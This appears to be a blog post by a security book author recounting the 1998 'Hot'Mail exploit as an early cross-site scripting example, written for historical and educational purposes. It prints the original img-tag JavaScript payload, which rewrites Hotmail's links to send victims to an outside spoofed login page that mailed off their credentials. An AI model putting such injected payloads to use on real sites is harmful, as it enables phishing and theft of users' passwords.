• My book starts off with a discussion of cross-site scripting (XSS) attacks along with examples from 2009 that illustrate the simplicity of these attacks and the significant impact they can have. What’s astonishing is how little many of the attacks have changed.

    Consider the following example, over a decade old, of HTML injection before the term XSS became so ubiquitous. The exploit also appeared about two years before the blanket CERT advisory that called attention to insecurity of unchecked HTML (CA-2000-02).

    On August 24, 1998 a Canadian web developer, Tom Cervenka, posted a message to the comp.lang.javascript newsgroup that claimed:

    We have just found a serious security hole in Microsoft’s Hotmail service (https://www.hotmail.com/) which allows malicious users to easily steal the passwords of Hotmail users.

    The exploit involves sending an e-mail message that contains embedded javascript code. When a Hotmail user views the message, the javascript code forces the user to re-login to Hotmail. In doing so, the victim’s username and password is sent to the malicious user by e-mail.

    Hotmail spoof

    The discoverers flouted the 90s trend to name vulns based on expletives or num3r1c characters and dubbed it simply the “Hot”Mail Exploit.

    (Disclosures of that era also tended to include greetz, typos, and self-aggrandizement that impressed upon the reader the hacker’s near-omnipotent skills. This disclosure failed on most of those aspects. However, the web site demo satisfied an Axiom of Hacking Culture by choosing a hacker handle that referenced pop culture, Blue Adept, a fantasy novel by Piers Anthony.)

    The attack required two steps. First, they set up a page on Geocities (a hosting service for web pages distinguished by being free before free was subsumed by the Web 2.0 label) that spoofed Hotmail’s login.

    The attack wasn’t particularly sophisticated; it didn’t need to be. The login form collected the victim’s credentials and IP address, then mailed them to the newly-created Geocities account.

    The second step involved executing the actual exploit against Hotmail by sending an email with HTML that contained a rather curious img tag. (Whitespace added for readability of the long, double-quoted string.):

    <img src="javascript:errurl='http://www.because-we-can.com/users/anon/hotmail/getmsg.htm';
    nomenulinks=top.submenu.document.links.length;
    for(i=0;i<nomenulinks-1;i++){
      top.submenu.document.links[i].target='work';
      top.submenu.document.links[i].href=errurl;
    }
    noworklinks=top.work.document.links.length;
    for(i=0;i<noworklinks-1;i++){
      top.work.document.links[i].target='work';
      top.work.document.links[i].href=errurl;
    }">
    

    The JavaScript changed the browser’s DOM such that any click would take the victim to the spoofed login page at which point it would coax credentials from an unwitting visitor. The original payload didn’t bother to obfuscate the JavaScript inside the src attribute. Modern attacks might have more sophisticated obfuscation techniques and use tags other than the img element, but it’s otherwise hard to distinguish what decade this payload is from.

    The problem of HTML injection, well known for over 10 years, remains a significant attack against web applications. (Another edit from the future: XSS remains a common vuln now almost 25 years after this disclosure.)

    • • •